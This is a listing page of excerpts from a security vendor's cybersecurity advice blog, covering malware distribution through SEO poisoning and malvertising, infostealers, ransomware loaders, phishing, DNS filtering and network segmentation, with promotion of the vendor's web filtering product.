Cybersecurity Advice
Our cybersecurity advice section provides comprehensive information about the latest online security threats – not only the threats from unfiltered spam emails, but also the risks present on the Internet from malvertising and vulnerable websites onto which malware exploit kits may have been loaded by cybercriminals.
We also provide advice on the precautions that can be taken to heighten cybersecurity defenses and mitigate the risk of inadvertently downloading an infection. The message throughout all of our cybersecurity advice is to protect your network and WiFi systems with an email spam filter and web content control solution.
by G Hunt |
July 31, 2023 |
Cybersecurity Advice
Cybercriminals use a variety of tactics, techniques, and procedures for distributing malware, and while email is one of the most common attack vectors, web-based malware attacks are becoming more common. In this article, we explore some of the ways that traffic is driven to malicious websites hosting malware and suggest ways that businesses can protect themselves against these attacks. SEO Poisoning SEO poisoning is the term given to the manipulation of search engine results to get malicious websites to appear high in the search engines for specific search terms, often those likely to be used by business users. Cybercriminals create a website/web page or compromise an existing website and create a page with malicious content. Cybercriminals often choose a domain name/page URL that is very similar to a brand that is being spoofed. Black hat search engine optimization techniques are used to trick search engines into ranking the page highly for a specific search term or set of search terms. Common techniques include keyword stuffing – adding many relevant keywords to the HTML and text; backlinking campaigns – adding many backlinks to a website from other websites such as via private link networks; cloaking – displaying different content to search engine crawlers than genuine visitors; and artificially increasing click through rates. These techniques may be used for promoting phishing and other scams, but they are most commonly used for malware distribution. A visitor to the site will be offered a download related to their search term or they otherwise be prompted to download a file that will silently install malware and give the attacker access to their device. Search Engine Ad Abuse / Malvertising It is easy to create a malicious website for malware distribution, but traffic needs to be driven to that website. Phishing emails are commonly used, but email filters are getting much better at detecting malicious hyperlinks. Instead, cybercriminals can drive traffic to malicious content via Google Ads and other search engine ad platforms or by adding malicious adverts to third-party ad blocks on legitimate websites. Many websites display these adverts as a way of...
by G Hunt |
June 22, 2023 |
Cybersecurity Advice, Internet Security News, Web Filtering
ChromeLoader is a family of malware that is extremely prevalent and persistent. The malware installs malicious browser extensions and removing them can be problematic as users are denied access to the Google Chrome extension list to prevent the removal of the malicious extensions if they are discovered. These malicious extensions are used to deliver unwanted ads, and redirect users to websites that they would otherwise not visit. At best, infection is a nuisance; however, the malware can increase the attack surface of a system and can easily lead to other malware being delivered. ChromeLoader was first observed in January 2022 and infections are now extremely widespread. The malware is most commonly spread via sites that offer pirated software – torrents and warez sites – with the malware usually delivered through infected ISO image files. Several campaigns have been detected that advertise pirated software, games, and movies on social media networks, especially Twitter, with the posts/tweets including links to download sites. When the installation file is downloaded and installed, the user will likely get the software, operating system, or game they are expecting, but ChromeLoader and/or other malware will also be installed. A new ChromeLoader distribution campaign has recently been detected by HP’s Wolf Security team. They report that the campaign has been active since at least March 2023 and delivers ChromeLoader, which installs a malicious adware browser extension called Shampoo. Shampoo will perform unwanted redirects to a variety of websites, including fake giveaways, games, and dating sites. These redirects can simply be annoying but can risk other malware infections. The malicious browser extension is also difficult to uninstall as the user will be prevented from accessing Chrome Extensions. If the user does manage to uninstall the adware, it will simply be reloaded when the device is rebooted via a Windows scheduled task. According to HP, this campaign uses a network of malicious websites that offer pirated material. The download sites deliver VBScripts that execute PowerShell scripts that fetch Shampoo and install the malicious Chrome extension....
by G Hunt |
April 30, 2023 |
Cybersecurity Advice, Internet Security News, Security Awareness Training
There has been a notable increase in search engine poisoning for distributing malware. Search engine poisoning is the term given to the manipulation of search engine results to display links to malicious websites. These websites can be used to phish for sensitive information, but this technique is most commonly used for distributing malware. Search engine poisoning can be achieved in different ways. One of the ways search engine poisoning is used to target businesses is to create a webpage and use search engine optimization techniques to target specific search queries. It can take a lot of time an effort to get webpages appearing in the organic search results for key search terms, but since the queries typically targeted have little competition, it is quite easy to get pages appearing high up in the organic search engine listings. Attackers typically target low volume business search queries, such as searches for contract templates, forms, and agreements. Since the person performing the search is looking to download the content, they can easily be tricked into downloading a malicious file. Oftentimes the user will get the file they are looking for but will silently install malware when the file is opened. Google is well aware that the higher up a webpage is in the search results, the more likely it will be visited. The prime spots are at the very top of the search engine results, and that area is reserved for sponsored links. Getting a malicious site in these links will maximize the traffic to a website, and advertisers compete for these advertising slots through the Google Ads online advertising platform. Advertisers can bid for these slots for key search terms that they want to target. Google Ads are increasingly being used by malicious actors as an alternative method of search engine poisoning, and they achieve the greatest success when they target popular software downloads. An attacker will create a website advertising a popular software solution, often cloning the website of a legitimate brand. They will offer a download of that software on the site but will alter the installation file so that in addition to installing the software, malicious code will...
by G Hunt |
January 31, 2023 |
Cybersecurity Advice, Security Awareness Training, Web Filtering
There has been an increase in the use of information-stealing malware by cybercriminals. Info stealers are typically installed to steal a range of sensitive data from a user’s device, such as system information, usernames and passwords, and cryptocurrency wallets. Infostealers typically have keystroke logging capabilities, allowing usernames and passwords to be obtained, which are then exfiltrated to the attacker’s command and control server, allowing the user’s accounts to be accessed. In 2022, cybercriminals increasingly used these types of malware in their attacks on businesses. The latest information stealers have been developed specifically for this purpose and instead of targeting individual accounts, they are being used for much more extensive attacks on businesses, and steal system information and session cookies that allow multifactor authentication controls to be bypassed. If the malware is installed, changing passwords will have little effect, as the attacker will already be in the system. Multifactor authentication can prevent stolen credentials from being used to access accounts, but modern malware is capable of stealing session cookies allowing accounts to be accessed. While multifactor authentication is important, it is not effective if the system has already been compromised. Further, phishing kits are now used that are capable of obtaining session cookies and bypassing multifactor authentication. Phishing attacks have also become more sophisticated and it is now common for a wide range of malicious attachments to be used for distributing malware and directing users to malicious websites. While Office documents are commonly used, now compressed files, ISO files, ZIP files, OneNote files, image files, HTML files, and more are used for malware distribution, many of which are not blocked by email security solutions. To protect against these new malware variants and multifactor authentication-bypassing phishing attacks, businesses need to rethink their protections. An email security solution is required to block malware delivery via email and identify and block the phishing emails that are used for credential theft. Email security solutions will...
by G Hunt |
November 30, 2022 |
Cybersecurity Advice, Security Awareness Training
Cybersecurity experts agree that security awareness training is an important part of any cybersecurity strategy. You can implement next-generation technology to repel malicious actors and prevent and rapidly detect cyberattacks, but it is important not to forget about the human element. According to the Verizon 2022 Data Breach Investigations report, 82% of all data breaches involve the human element. Through training, you can teach cybersecurity best practices and reduce risky behaviors that open the door to hackers, and you can train employees how to identify phishing. The percentage of companies providing security awareness training to their employees is increasing as the importance of training is now better understood, but one aspect of the training process that is often neglected is conducting phishing simulations on the workforce. Phishing simulations are fake but realistic phishing emails that businesses send internally to employees. You may wonder why you should do such a thing. Well, there are clear benefits that come from doing so. Here we provide five reasons why conducting phishing simulations on employees is beneficial. 1. Create a Baseline to Measure the Effectiveness of your Training Many companies provide security awareness training but are unable to measure its effectiveness, other than a reduction in data breaches and phishing incidents. Phishing simulations are a great way to monitor the effectiveness of training over time and clearly show the return on investment. Conduct phishing simulations before you start your training program and you have a baseline against which you can measure the effectiveness of training over time and see the ROI. 2. Test the Effectiveness of Training in a Work Setting You can show an employee the signs of phishing that they need to look out for, and you can test to make sure they have understood the training at the end of the training course, but that does not mean the training will be remembered nor that it will be applied when they are at work. Phishing is often successful because the emails arrive in inboxes when employees are busy, and that is why mistakes are made. Phishing simulations allow you to test...
by G Hunt |
October 31, 2022 |
Cybersecurity Advice, Web Filtering
Cybercriminals have a diverse arsenal for conducting attacks. Phishing is a leading attack vector used by ransomware gangs, nation-state threat actors, and other cybercriminals, and even the protection provided by multifactor authentication is now being bypassed in some sophisticated campaigns. Unpatched vulnerabilities are often exploited to gain access to networks, then there are brute force attacks to guess weak credentials, but many attacks are conducted over the web. Common Web-Based Threats Malicious adverts are added to advertising networks, which see the adverts displayed in the third-party ad blocks on many of the most popular websites. Termed malvertising, these adverts redirect users to malicious websites where malware is downloaded or to phishing content. The adverts often advertise fictitious software solutions, which users are tricked into downloading and installing. Oftentimes, genuine programs are installed, albeit with malware installed in the background. Despite the controls Google has in place for detecting malicious content, some malicious ads are displayed in the search engine listings. These malicious adverts are displayed at the top of the Google listings, so can attract considerable traffic. In the fall of 2021, one such campaign targeted cryptocurrency investors, and saw losses incurred of more than $500,000 before Google detected and removed the malicious adverts from its Google Ads platform. Malicious websites are also displayed in the search engine listings for specific business searches, with SEO poising techniques used to get the sites to appear high up in the listings. These websites may only have a short shelf life before they are detected and removed from the listings, but they are added in such volume that they do pose a significant risk. These campaigns are commonly used for distributing malware, with users tricked into thinking they are downloading the content or program they have been searching for. Another common web-based attack involves pirated software and copyright-infringing material that is added to peer-to-peer file-sharing networks, where the user is tricked into installing the malware in the belief they are...
by G Hunt |
September 30, 2022 |
Cybersecurity Advice, Cybersecurity News, Web Filtering
A new and dangerous new malware called Erbium is being advertised on hacking forums and has the potential to become a major threat. Erbium malware is an information stealer with extensive functionality, which is offered under the malware-as-a-service (MaaS) model. MaaS provides hackers with an easy way to conduct attacks. The MaaS operators develop their malware and lease it out, usually charging a weekly, monthly, or annual subscription. The MaaS operator provides detailed instructions on how to conduct attacks, which means the malware can be used without having to become a programming expert. In fact, many MaaS operations make conducting attacks incredibly easy, requiring little in the way of technical skill. After signing up to use the malware, it can be operated via the web-based UI, where users can access the data stolen by the malware. Oftentimes, live chat is available to help resolve any issues. Currently, one of the most popular information stealers available under the MaaS model is the RedLine Stealer, which is a highly capable malware variant that can be purchased or rented under a subscription model. The malware can steal information from browsers such as autocomplete data and saved credentials, steal from FTP and IM clients, and from cryptocurrency wallets. The latest variants allow users to upload and download files. RedLine has proven very popular; however, it is quite expensive. Erbium malware is disrupting the market, offering broadly the same capabilities as RedLine but for a fraction of the cost. Initially, Erbium malware was being advertised at just $9 per week, although due to the popularity of the malware the price was increased to $100 per month. Even with the increase, the malware is far cheaper than RedLine, and based on user feedback, it is proving very popular with the cybercrime community. Erbium malware is a work in progress, but it already has extensive capabilities. The malware can steal information from browsers such as saved credentials, cookies, credit card numbers, and autofill information. It can steal from cryptocurrency wallets installed on web browsers and attempts to steal from a wide range of cold desktop cryptocurrency...
by G Hunt |
June 30, 2022 |
Cybersecurity Advice, Cybersecurity News, Internet Security News, Network Security
Ransomware gangs gain initial access to business networks using a variety of techniques, with phishing one of the most common methods of gaining initial access to business networks. Phishing is used to obtain credentials, especially for cloud-based services and applications. Phishing emails are often used to deliver malware loaders. Once installed, the malware loader drops malicious payloads which ultimately results in a network-wide ransomware attack. A relatively new malware loader – Bumblebee – is now gaining popularity with ransomware gangs and is known to be used by some of the highest profile ransomware operations. According to Symantec, Bumblebee Loader is known to be used by Conti, Quantum, and Mountlocker, and possibly others, and has fast become the ransomware delivery vehicle of choice. The BumbleBee loader is primarily delivered via phishing emails and is used to create a backdoor in victims’ networks, allowing the attacker to take control of devices and execute commands. Bumblebee has been observed delivering the Cobalt Strike attack framework, which is used for lateral movement within networks. Once a sufficiently high number of devices and systems have been compromised, the BumbleBee loader drops the ransomware payload. After sensitive data has been exfiltrated from the victim’s systems, the file encryption process is initiated. According to Symantec, the Bumblebee loader has replaced several other malware variants that have proven popular with ransomware gangs in the past, such as the TrickBot Trojan and BazarLoader. The replacement of those malware variants with Bumblebee the loader appears to have been pre-planned. If the Bumblebee loader is detected on any device, rapid action should be taken as it is likely that the malware could lead to a ransomware attack. The Growing Threat of Ransomware Attacks Ransomware attacks on businesses increased significantly in 2021. The Federal Bureau of Investigation (FBI) reported in its 2021 Internet Crime Report that the FBI Internet Crime Complaint Center (IC3) received 2,084 reports of ransomware attacks between January 1 and July 31, 2021, which represents a 62% increase year-over-year. The 2021...
by G Hunt |
January 26, 2022 |
Cybersecurity Advice, Internet Privacy, Internet Security News, Web Filtering
Cybercriminals are constantly developing new tactics to trick individuals into divulging sensitive information or installing malware. One of the latest tactics to be observed is the use of QR codes to direct people to malicious websites where sensitive information is harvested or to sites hosting malware. A QR code is a machine-readable matrix barcode that is often used for tracking products in a supply chain, but in recent years has been adopted as a convenient way to direct people to web resources without them having to enter a URL or click a link. QR codes have been widely adopted during the COVID-19 pandemic for carrying out contactless operations, such as registering attendance at a venue and for viewing menus in restaurants to help prevent the spread of COVID-19. Many smartphones have in-built QR code readers and apps can be downloaded for free to allow QR codes to be read. When a smartphone camera picks up a QR code, the user will be directed to whatever web resource has been programmed into the code. While QR codes have many important uses, QR codes can be easily tampered with to direct individuals to malicious websites. Phishing emails often contain links to malicious websites that have been masked by changing the text in the hyperlink. Hovering a mouse arrow over the hyperlink on a computer will display the URL to which the user will be directed; however, with a QR code the user may be instantly directed to the website and could be prompted to enter their banking credentials, Microsoft 365 credentials, or other sensitive information. Since QR codes are often used to direct individuals to hosted files, such as PDF restaurant menus, it would be easy to trick people into downloading malicious files through QR codes. The malware could provide a cybercriminal with access to the victim’s mobile device, allowing them to steal sensitive information such as passwords or bank account information. Many businesses use QR codes to direct customers to websites where payments can be processed, and the use of QR codes for this purpose has increased significantly during the pandemic to avoid contact with Point-of-Sale card readers. QR codes could be abused to direct...
by G Hunt |
June 28, 2021 |
Cybersecurity Advice, Internet Security News, Network Security, Web Filtering
Ransomware is now one of the biggest threats faced by businesses. When hackers gain access to business networks, it is now common for large quantities of data to be stolen prior to file encryption. Ransomware gangs know all too well that businesses with good backup policies will be able to restore their encrypted data from backups, but they will need to pay the ransom in order to prevent the release or sale of the stolen data. Even when files can be recovered from backups, many businesses feel they have no alternative other than paying the ransom to ensure stolen data are deleted. Data from Coveware indicates 70% of ransomware attacks now involve data theft. Ransomware attacks are incredibly costly, even if the ransom is not paid. Universal Health Services Inc. in the United States suffered a Ryuk ransomware attack in September 2020 and the health system choose not to pay the ransom. Add up the recovery costs which included data restoration, cybersecurity consultants, notification letters to patients, and the loss of many services during the remediation process, and the cost of the attack rose to $67 million. While expensive, that high cost is just a fraction of the cost of the recent Conti ransomware attack on Ireland’s Health Service Executive. The May 2021 ransomware attack caused massive disruption to healthcare services in Ireland. Without access to patient records, patient safety was put at risk, non-urgent appointments had to be cancelled, and there were major delays getting test results. A few days after issuing a ransom demand of €20 million, the Conti ransomware gang gave the HSE the decryption tools free of charge. Even with the valid tools to decrypt data, recovery has been slow and incredibly costly. It has been around a month since the tools were provided to decrypt files, but many systems are still inaccessible. HSE Chief executive Paul Reid said it is likely to take months before all systems are brought back online. Simply eradicating the attacker from the network and recovering encrypted data is only part of the story. IT systems need to be upgraded, security greatly improved, and a security operation center needs to be set up to monitor the...
by G Hunt |
May 21, 2021 |
Cybersecurity Advice
It used to be quite easy to identify a phishing email, but over the past few years, scammers have really upped their game. Some of the phishing emails now being sent can fool even the most security conscious and well-trained people, but if you know the signs of phishing email, you should be able to identify and avoid all but the most sophisticated phishing attempts. What is Phishing? Phishing is the name given to a tactic used by cybercriminals to obtain sensitive information through deception, often by impersonating a trusted source. Phishing is also used to deceive people into taking an action that allows the attacker to achieve their aim. This could be installing malware or even changing security settings on a device. Phishing can be viewed as the digital equivalent of a confidence trickster, so these tactics are certainly nothing new. The attack technique gets the name from fishing. With fishing, a lure or bait is used to trick a fish into swallowing a hook. With phishing, a lure is used to trick an individual into taking an action in the belief that the request is genuine. Phishing can take place over the telephone, in person, via text messages, social media networks, or chat platforms, although most commonly it occurs via email. Attacks are easy to perform, as all that is needed is an email address to send the messages and a phishing template. If credential theft is the goal, a website hosting a phishing kit is required to harvest credentials. Phishing kits are widely available on hacking forums and malware can also be purchased, so an attacker really only needs email accounts to send the messages. Phishing emails can range from basic to highly sophisticated, and while email security solutions are effective at identifying phishing emails and ensuring they are not delivered to inboxes, no email security solution is capable of blocking every phishing threat without also blocking unacceptable numbers of genuine emails. It is therefore essential for employees to be told how to spot the signs of a phishing email and for them to be conditioned how to respond when a suspicious email is received. Phishing Tactics are Constantly Changing! There are tried and...
by G Hunt |
April 30, 2021 |
Cybersecurity Advice
Learning how to identify phishing emails is an important skill: One that all employees need to master. Many phishing emails are easy to spot if you know the signs of a phishing email to look for. It is not necessary to spend a couple of minutes checking every email at work, after all, that would leave little time for doing anything else. There are some quick and easy checks that take a few seconds and can easily allow you to identify phishing emails quickly. Performing these simple checks on each inbound email should become second nature before long. 5 Easy Ways to Identify Phishing Emails Listed below are 5 basic checks that should be performed to identify phishing emails. These will allow you to identify the most common techniques used by phishers to steal your credentials or get you to install malware. Check the Sender’s Email Address Many emails will have a different display name to the actual email address, so it is important to check who the real sender is. The display name can be easily configured by the sender to make you think an email is genuine. You may receive an email that has PayPal as the display name, but the sender’s email address could have a non-PayPal domain or have been sent from a Gmail account or another free email service. Free email services such as Gmail, Yahoo, Hotmail are not used by businesses. Check that the domain – the part of the email address after the @ symbol – matches the sender. For PayPal that would be PayPal.com. Also check to make sure the domain name is spelled correctly and that there are not any transposed or replaced letters. It is common to replace an i to be replaced with a number 1 for example, an m to be switched to an rn, or hyphens to be added to domains to make them look official. Pay-Pal for instance. Carefully Check Hyperlinks in Emails Phishing occurs via email, but the actual credential theft usually occurs online. Hyperlinks are included in emails that direct people to a web page where they are asked to enter sensitive information such as their email login credentials. These web pages are usually carbon copies of genuine login prompts for services such as Office 365, apart from the domain on which the...
by G Hunt |
March 31, 2021 |
Cybersecurity Advice
Phishing is the biggest cyber threat faced by businesses. Phishing emails are malicious email messages that use deception to obtain sensitive information or trick individuals into installing malware. During the pandemic, cybercriminals took advantage of COVID-19 trends and created phishing emails that spoofed trusted entities such as the World Health Organization (WHO) and the Centers for Disease Control and Prevention offering up to date information on the coronavirus. Companies offering personal protective equipment (PPE) were impersonated when there was a shortage of supply, and recently pharmaceutical firms have been spoofed to send offers related to COVID-19 vaccines. One of the primary aims of these scams is to obtain Microsoft 365 credentials, which give the attackers access to the treasure trove of data that is typically found in email accounts. The compromised emails accounts are used in email impersonation attacks on other individuals in the organization, or in business email compromise (BEC) attacks to trick finance department employees to make fraudulent wire transfers. A single compromised Microsoft 365 account can give attackers the foothold they need for a much more extensive attack on the organization, with phishing emails the initial attack vector used to deliver ransomware. These phishing emails can be difficult for employees to identify, even when they are provided with security awareness training. Once an email lands in an inbox, there is a high chance to that email being opened and an employee taking the action requested in the email, so it is essential for businesses to have an effective email security solution in place that can identify and block these malicious messages. Malware Delivery via Email is Increasing Recent research has shown that phishing emails are now the primary method used to deliver malware and the number of emails distributing malware is increasing. A study recently published by HP in its threat insights report shows 88% of malware is now delivered via email, with the volume of messages distributing malware increasing by 12% from the previous quarter. Many of these emails contain executable files that directly install...
by G Hunt |
March 18, 2021 |
Cybersecurity Advice, Network Security, Web Filtering
What is Network Segmentation? Network segmentation is the act of dividing a computer network into smaller physical or logical components. Two devices on the same network segment can then talk directly to each other. For communication to happen between segments, the traffic must flow through a router or firewall. This passage allows for traffic to be inspected and security policies to be applied. Network segmentation is one of the mitigation strategies in terms of protecting against data breaches and multiple types of cyber security threats. In a segmented network, device groups have the connectivity required for legitimate business use only. The ability of ransomware to spread is greatly restricted. However all too often organizations operate an unsegmented network. Network segmentation can also help to boost performance. With fewer hosts on each subnet, local traffic is minimized. It can also improve monitoring capabilities and helps IT teams identify suspicious behavior. If you follow network segmentation best practices and set up firewall security zones you can improve security and keep your internal network isolated and protected from web-based attacks. Looking to get enterprise-grade protection from malware and phishing? Sign up for a free WebTitan demo today. Book Free Demo Network Segmentation Benefits There are many benefits to be gained from network segmentation, of which security is one of the most important. Having a totally flat and open network is a major risk. Network segmentation improves security by limiting access to resources to specific groups of individuals within the organization and makes unauthorized access more difficult. In the event of a system compromise, an attacker or unauthorized individual would only have access to resources on the same subnet. If access to certain databases in the data center must be given to a third party, by segmenting the network you can easily limit the resources that can be accessed, it also provides greater security against internal threats. Network Segmentation Best Practices Most businesses have a well-defined network structure that includes a secure internal network zone and an external untrusted...
by G Hunt |
January 31, 2021 |
Cybersecurity Advice
Phishing remains the number one cyber threat to businesses and there are no signs that cybercriminals will be abandoning phishing any time soon. Phishing is defined as the use of deception to fraudulently obtain sensitive information, which often involves impersonating trusted individuals and using social engineering techniques to trick people into disclosing their login credentials. It is not necessary to be a hacker to conduct phishing campaigns. All that is needed is a modicum of technical expertise and the ability to send emails. The actual phishing kits that are loaded onto websites to harvest credentials do not need to be created from scratch, as they can simply be purchased on hacking forums and dark net websites. A potential phisher only needs to pay for the kit, which typically costs between $20 and $1,000, then host it on a website, and send emails, SMS messages, or instant messages to direct users to the website. The ease of obtaining a phishing kit makes this this method of attacking businesses simple. All that is needed is a plausible lure, and many people will disclose their credentials. Figures released by security awareness training companies show just how frequently employees fall for these scams. Around 30% of phishing emails are opened by recipients, and 12% of those individuals either open attachments or click hyperlinks in emails. One 2020 study, conducted on 191 employees of an Italian company, showed no significant difference between employees’ demographics and susceptibility to phishing. Anyone can fall for a phishing scam. Interestingly, that study, published by the Association for Computing Machinery, also found that while the employees believed their security awareness training had been effective, it did not appear to have any effect on their susceptibility to phishing attacks. Phishing is popular with cybercriminals, it is one of the easiest scams to perform, and it is often successful and profitable. Security awareness training will help to prepare employees and, if performed properly, regularly, and with subsequent phishing simulations to reinforce the training, can help to reduce susceptibility, but what is most important is to...
by G Hunt |
January 30, 2021 |
Cybersecurity Advice, Internet Security News, Network Security, Web Filtering
DNS filtering – or Domain Name System filtering to give it its full title – is a technique of blocking access to certain websites, webpages, and IP addresses. The DNS is what allows easy to remember domain names to be used – such as Wikipedia.com – rather than typing in very difficult to remember IP addresses – such as 198.35.26.96. The DNS maps IP addresses to domain names to allow computers to find web resources. When a domain is purchased from a domain register and that domain is hosted, it is assigned a unique IP address that allows the site to be located. When you attempt to access a website, a DNS query will be performed. Your DNS server will look up the IP address of the domain/webpage, which will allow your browser to make a connection to the web server where the website is hosted. The webpage will then be loaded. The actual process involves several different steps, but it is completed in a fraction of a second. So how does DNS Web Filtering Work? With DNS filtering in place, rather than the DNS server returning the IP address if the website exists, the request will be subjected to certain controls. DNS blocking occurs if a particular webpage or IP address is known to be malicious. The DNS filter will use blacklists of known malicious websites, previous crawls of new websites and web pages, or web content will be assessed in real time if the web page or website has not previously been crawled and categorized. If the website trying to be accessed is determined to be malicious or otherwise violates pre-defined policies, instead of the user being connected to the website, the browser will be directed to a local IP address that displays a block page explaining why the site cannot be accessed. This control could be applied at the router level, via your ISP, or by a web filtering service provider. In the case of the latter, the user – a business for instance – would point their DNS to the service provider. That service provider maintains a blacklist of malicious webpages/IP addresses and access to those sites is prevented. Since the service provider will also categorize webpages, the DNS filter can also be used to block access to certain categories of...
by G Hunt |
January 25, 2021 |
Cybersecurity Advice, Internet Security News, Network Security
COVID-19 presented many new opportunities for cybercriminals, many of which have proven to be highly successful. In the early days of the pandemic, when it became clear that the new coronavirus was spreading beyond the borders of China and concern about the virus grew, cybercriminals switched from their normal phishing campaigns and started adopting COVID-19 lures. Phishing campaigns were conducting offering advice about the virus, potential cures, and advice as people craved information that was in short supply. Fake COVID-19 tracking apps and websites were set that collected sensitive information or installed malware, and PPE shortages saw fake shops set up offering non-existent supplies. Then there were fake charities, disinformation campaigns, and phishing scams related to job retention schemes, self-employment income support, government coronavirus loans, and fake tax rebates. The move to remote working due to the pandemic saw hackers targeting vulnerabilities in remote working solutions such as VPNs and throughout 2020, ransomware gangs have been extremely active, especially in Q3 and Q4, 2020 when attacks soared. As we move into 2021, cybercriminals are likely to continue to exploit the pandemic to steal credentials, access sensitive data, and spread malware and ransomware, so it is important for businesses not to let their guard drop and to continue to ensure that they have appropriate protections in place to block threats. The Cyber Threat Landscape in 2021 The high level of ransomware attacks in the last quarter of 2020 is likely to continue in 2021. There are no signs that cybercriminals will reduce attacks, as they are still proving to be profitable. The healthcare industry is likely to continue to be targeted, with cyberattacks on pharmaceutical and clinical research firms also extremely likely. Now that COVID-19 vaccines have been approved and are starting to be rolled out, cybercriminals have yet another opportunity. The vaccine rollout is likely to take many months and it could well be the autumn or later before most people receive the vaccine. Cybercriminals have already adopted COVID-19 vaccine lures to obtain sensitive information and spread...
by G Hunt |
November 30, 2020 |
Cybersecurity Advice, Network Security
The importance of choosing strong and unique passwords for every account you create has been highlighted by a recent data breach at the music streaming service Spotify. Security researchers identified a database that had been exposed on the Internet which contained the usernames and password combinations of around 300 million individuals. It is unclear where the database came from, although it is likely that it had been amalgamated from data leaks from several major data breaches of online platforms. Interestingly, within the 300 million-record database was a field stating whether the username/password could be successfully used to login to a Spotify account. According to the researchers, an estimated 300,000 to 350,000 Spotify accounts had been breached. This breach clearly demonstrates how a data breach at one company can provide the usernames and passwords to gain access to accounts at another. When a username/password is obtained in a cyberattack, it can be used to try to access other accounts that share the same username. A username is often an email address. People may have more than one email address, but there is usually one that is used across most platforms. There is nothing wrong with that of course, but there is a problem with using the same password with that email address on multiple online platforms. If there is a breach at one platform, the password can be used to access many other accounts. In this example, up to 350,000 Spotify users had reused their password on more than one platform. The Spotify breach victims may well have had several other accounts breached if they used their password on other platforms too. The credentials to the breached Spotify accounts could easily be sold to anyone who wanted a cheap Premium Spotify account. There have been many reports of passwords being changed to block the real account holder out of their account. The accounts also contain personal information that could be used in further attacks, such as to make convincing phishing emails to obtain the information necessary for identity theft and other types of fraud. Trying 300 million username and password combinations is a time-consuming process, but that...
by G Hunt |
August 19, 2020 |
Cybersecurity Advice
Many companies now allow employees to work from home for at least some of the week. The number of companies allowing remote working increased by 300% from 1996 to 2016, according to a Gallup poll. In 2016, Gallop found that 43% of employees said they spent at least some time working away from their co-workers. Then came the COVID-19 pandemic, which forced companies to allow virtually their entire workforce to work from home as countrywide lockdowns were introduced. Lockdowns have now been eased and employees are returning to their offices, but many have got used to home working and want to have the option to continue. Since many employers noticed no drop in productivity – some even saw productivity increases – it is likely that some employers will continue to allow employees to work from home if preferred. A study by cartridge People in the UK found 32% of UK office workers were planning to continue to work from home after the lockdown was eased. Remote Working Increases Security Risks While productivity may not decrease and employees may be happy with some employees working from home, home working is not without its risks. There are security concerns with remote working. It is harder for IT teams to secure devices and networks when the workforce is spread geographically and are not under the protection of the corporate firewall. With many workers connecting to their corporate networks remotely, it becomes harder to identify malicious connections. It is also much easier for threat actors to attack remote workers who connect to the Internet via consumer-grade routers, which are often never updated and have many security holes. With office workers, it is easy to check if a request to change bank account information is genuine or other out-of-band request is made. All it takes is a quick visit to the employee’s desk. While phone calls can be made, performing these checks is more time consuming and complicated with remote workers. The pandemic also forced many companies to allow their employees to work remotely using their personally-owned devices, which may lack the security measures implemented on corporate-owned devices. There are also many distractions in the...
by G Hunt |
July 29, 2020 |
Cybersecurity Advice
Phishing is one of the biggest cyber threats faced by businesses and stopping phishing attacks from succeeding can be a big challenge. The purpose of phishing is usually to obtain sensitive information, most commonly employee credentials to email accounts, cloud services, social media accounts, or credit card or banking credentials. This is also achieved through the use of malware that is delivered using phishing emails. Phishing attacks can take place over the telephone, via text message, social media networks, instant messaging, or any other form of communication, but most commonly the attack vector is email. For a phishing attack to be successful, user interaction is usually required. An employee must be convinced to part with the information that the phisher is targeting, and a wide range of lures are used to encourage that. Social engineering techniques are also used to encourage prompt action to be taken – To respond without really thinking too much about the legitimacy of the request. At its most basic level, a phishing attack requires little skill and next to no financial outlay; however, many phishing campaigns now being conducted have been carefully crafted, research is conducted on the companies and individuals being targeted, and the websites used to harvest credentials are skillfully created and often carbon copies of the genuine websites that they spoof. Phishing emails often appear to have been sent from a trusted brand or contact, either by spoofing a genuine email address or using a compromised email account. Some phishing attempts are laughable and are easily identified, others are much harder to identify, with some of the most sophisticated phishing emails virtually indistinguishable from genuine email requests. As a business, you should take steps to improve your defenses against phishing attacks, as failure to do so could easily result in a malware or ransomware infection, costly data breach, theft of intellectual property, and damage to the reputation of your company. Tips for Businesses to Improve Their Defenses Against Phishing Attacks To help you improve your defenses and prevent phishing attacks from succeeding we have listed some of...
by G Hunt |
July 28, 2020 |
Cybersecurity Advice
The Emotet botnet sprang back to life and started sending large volumes of malicious spam emails earlier this month. The botnet consists of hundreds of thousands of computers that have been infected with Emotet malware and is capable of sending huge spam campaigns. Emotet malware steals usernames and passwords for outgoing email servers, which are used to send emails from a company’s legitimate email server. This tactic helps to ensure the emails are delivered because the mail servers used to send the messages are trusted. The volume of emails sent from those mail servers is also limited to stay under the radar and avoid detection by security teams. The emails contain a malicious attachment or a hyperlink that directs the recipient to a website where Emotet malware is downloaded. These malicious sites often change, and most commonly are compromised WordPress sites. The attachments are commonly Word documents with malicious macros, which launch PowerShell commands that download the Emotet payload. Once installed, Emotet starts sending emails to infect more devices but is also used to deliver other malware payloads, typically a banking Trojan such as TrickBot or QakBot. Both Trojans have been distributed by Emotet malware in the latest campaign. Emotet is one of the main malware threats, and was the leading malware threat in 2018 and 2019. It is also one of the most dangerous. Infection with Emotet will eventually also see a banking Trojan downloaded, and that Trojan is often used to deliver ransomware. The Emotet gang targets businesses and uses a wide range of lures in its campaigns. Fake invoices, shipping notices, job applications, and purchase orders are often used. A commonly used tactic used which has proven to be extremely effective is the hijacking of email threads. Emotet uses legitimate email threads and inserts links and attachments. The hijacking of email threads adds credibility to the emails, as it appears that the email is a response to a previous conversation with a known and trusted contact. The response appears to be a follow up on a past conversation. The latest campaign has seen the Emotet gang adopt a new tactic, one that has not been used...
by G Hunt |
May 20, 2020 |
Cybersecurity Advice, Network Security
There has been an increase in phishing attacks on remote workers using COVID-19 as a lure over the past few months. Multiple studies suggest the number of COVID-19 related phishing attacks have soared. The anti-phishing training company KnowBe4 placed the rise at about 600% in Q1, 2020, and that rise has continued in Q2. As was pointed out by Microsoft, the total number of phishing attacks has not increased by any major degree during the COVID-19 public health emergency, as cyber actors have finite capabilities for conducting attacks. What has happened is threat actors have abandoned their standard phishing campaigns and have repurposed their phishing infrastructure and are now using COVID-19 lures, and with good reason. People crave information about the 2019 Novel Coronavirus, SARS-CoV-2, and COVID-19. There is a thirst for knowledge about the virus, how it infects people, how to prevent infection, and how great the risk is of catching it. With little information available about this new virus, finding out more information required following the news from countries around the world that are involved in research. Unsolicited emails offing important information naturally had a high open rate, so it is no surprise that COVID-19 phishing attacks have increased. To control the spread of the virus, countries have gone into lockdown, so businesses have had to allow their employees to work from home. The increase in home workers happened very quickly, so businesses did not have the time to prepare properly and that meant new risks were introduced. It is therefore no surprise that there has been an increase in data breaches during the COVID-19 pandemic. Cybercriminals 